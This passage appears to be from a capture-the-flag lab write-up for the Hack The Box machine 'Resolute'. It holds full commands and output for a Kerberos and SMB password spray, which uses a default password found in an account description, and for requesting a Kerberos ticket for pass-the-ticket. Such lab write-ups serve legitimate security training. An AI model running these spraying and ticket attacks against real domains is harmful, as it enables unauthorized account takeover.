Default Credential


I discovered that the target system has broken access control across several services, including MSRPC and LDAP. While both allowed me to gain an initial overview of the target domain, I had more success with the MSRPC server, as it also exposes the target's system information alongside the domain details.

While I was checking individual user data, I found that one of the users, marko, has a CLEARTEXT password hard-coded into the Description attribute. I will attempt to validate the credential here.

┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ impacket-gettgt 'megabank.local/marko:Welcome123!' -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
kerberos sessionerror: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

It fails.

While the validation failure looks like a dead end, there is an easy-to-miss but important point.

The description also mentions "Account Created", as if the account had been provisioned automatically. It is very possible that Welcome123! is the default password for new users in the target domain.

If that is the case, I can attempt a password spray attack.

Password Spray


┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ kerbrute passwordspray --dc resolute.megabank.local -d MEGABANK.LOCAL users 'Welcome123!'
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 06/10/23 - Ronnie Flathers @ropnop
 
2023/06/10 18:29:57 >  Using KDC(s):
2023/06/10 18:29:57 >  	resolute.megabank.local:88
 
2023/06/10 18:29:58 >  Done! Tested 27 logins (0 successes) in 0.605 seconds
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ cme smb $IP -d MEGABANK.LOCAL -u users -p 'Welcome123!' --continue-on-success
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] MEGABANK.LOCAL\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\zach:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\simon:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK.LOCAL\naoki:Welcome123! STATUS_LOGON_FAILURE 

While it failed with Kerbrute, it went through with crackmapexec against the target SMB server. The password belongs to the melanie user.

I will confirm it again.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ impacket-gettgt 'megabank.local/melanie:Welcome123!' -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in melanie.ccache

Confirmed, and a TGT has been created for better OPSEC with the pass-the-ticket technique. Now that I have a valid domain credential, a much wider enumeration surface opens up. I'll start with ldapdomaindump.